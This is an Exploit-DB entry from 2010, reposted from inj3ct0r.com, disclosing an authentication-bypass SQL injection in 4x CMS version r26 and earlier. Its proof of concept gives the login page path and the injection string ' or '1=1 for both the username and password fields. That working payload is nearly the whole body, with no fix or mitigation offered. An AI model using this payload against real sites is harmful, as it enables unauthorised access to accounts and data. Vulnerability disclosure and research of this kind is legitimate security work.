4x CMS <= r26 Auth Bypass SQL Injection Vulnerability

2010-03-21T00:00:00
ID EDB-ID:11833
Type exploitdb
Reporter cr4wl3r
Modified 2010-03-21T00:00:00

Description

4x cms <= r26 (Auth Bypass) SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            =======================================================
4x cms &lt;= r26 (Auth Bypass) SQL Injection Vulnerability
=======================================================


[+] 4xcms &lt;= r26 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered by: cr4wl3r
[+] My id: http://inj3ct0r.com/author/945
[+] Original: http://inj3ct0r.com/exploits/11392
[+] Download : http://code.google.com/p/4xcms/downloads/list

[+] PoC: [path]/login.php
    User : ' or '1=1
    Pass : ' or '1=1

[+] Greetz: All member inj3ct0r.com


# Inj3ct0r.com [2010-03-22]